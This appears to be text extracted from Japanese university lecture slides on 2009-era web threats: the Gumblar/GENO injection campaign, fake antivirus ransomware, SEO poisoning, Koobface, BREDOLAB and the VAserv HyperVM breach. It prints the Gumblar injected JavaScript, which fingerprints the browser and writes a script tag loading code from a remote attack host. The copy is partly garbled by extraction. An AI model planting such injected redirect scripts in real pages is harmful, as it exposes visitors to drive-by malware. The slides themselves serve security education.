印刷用PPT-龙谷大学.ppt

Gumblar（GENOウイルス、JSRedir-R） 解釈 script language=javascript!-- var a=ScriptEngine,b=Version()+,j=,u=navigator.userAgent;if((u.indexOf(Chrome)0)(u.indexOf(Win)0)(u.indexOf(NT 6)0)(document.cookie.indexOf(miek=1)0)(typeof(zrvzts)!=typeof(A))){zrvzts=A;eval(if(window.+a+)j=j++a+Major+b+a+Minor+b+a+Build+b+j;);document.write(script src=//mart+/vid/?id=+j+\/script);} --/script Gumblar（GENOウイルス、JSRedir-R） spam の送信 にせアンチウイルス（System Security 2009）のインストール 実はランサムウェア（身代金要求ソフトウェア） アプリケーションを開こうとすると、「ファイルが感染しているのでアプリケーションを実行できない。System Securityをアクティベートせよ」と警告し、ユーザーを販売サイトに誘導してクレジットカード番号などの入力を迫る。 http://www.itmedia.co.jp/enterprise/articles/0905/14/news021.html Google 検索結果を改ざん マルウェアサイトへ誘導 アンチウイルスソフトの停止 アプリケーションを開こうとすると、「ファイルが感染しているのでアプリケーションを実行できない。System Securityをアクティベートせよ」と警告し、ユーザーを販売サイトに誘導してクレジットカード番号などの入力を迫る。 Gumblar（GENOウイルス、JSRedir-R） 2009.10 から活動を再開（Gumblar.x） 難読化が高度に 攻撃サイトが複数に Adobe Reader / Flash Player の他、Internet Explorer（MS09-002）や Microsoft Office Web コンポーネント（MS09-043）を攻撃 挿入スクリプトを随時改訂、再感染 調査妨害機能の強化 regedit が起動されるとレジストリ改ざんを元に戻す、など The Gumblar system: 全自動にて運行中 誘導サイト（Redirector） 40,000 以上 攻撃サイト（Infector） 700 以上 管理サイト（Dispatcher） 10未満 配布サイト（Injector） 50程度 一般ユーザ /en/weblog?weblogid=208187897を元に作成 にせアンチウイルス たとえばこういうやつ Windows Enterprise Suite Windows Enterprise Suite /jp/analisis/3da565c62d0ae1807ef63265c37a284fffe337c78b04d831289fd9762aeb2558-1258213540 Windows Enterprise Suite /report.aspx?md5=5e0bada3c29e11ac8676a19bbbd636f3 いつでもどこでも Web 検索結果 SEO ポイズニング 検索結果をマルウェアが改ざん 一般の Web サイト Web 広告 改ざんされた Web サイト マルウェア配布用 Web ページ SNS、Twitter Koobface ボットネット 電子メール（記載された URL にアクセスして、添付されたダウンローダを介して） 例: BREDOLAB ダウンローダ BREDOLAB が設置するもの にせアンチウイルス「Antivirus Pro 2010」 ボットネット「Zeus」 参考になるページ /mdl.php / 仮想化関連 英ISPのVAserv、zero-day攻撃を受ける。脆弱性を突かれたソフトウェアの会社社長は自殺 http://slashdot.jp/security/article.pl?sid=09/06/12/0539235 VAserv の件（2009.06） VAserv は仮想化ホスティングサービスの管理ソフトとして HyperVM を使用 HyperVM を組み込んだ仮想ホスティングプラットホーム Kloxo（旧称 Lxadmin）に複数の脆弱性が発見される。発見者は 2009.05.21 に開発元 lxlabs に通知したというが、めぼしい反応が得られなかった模様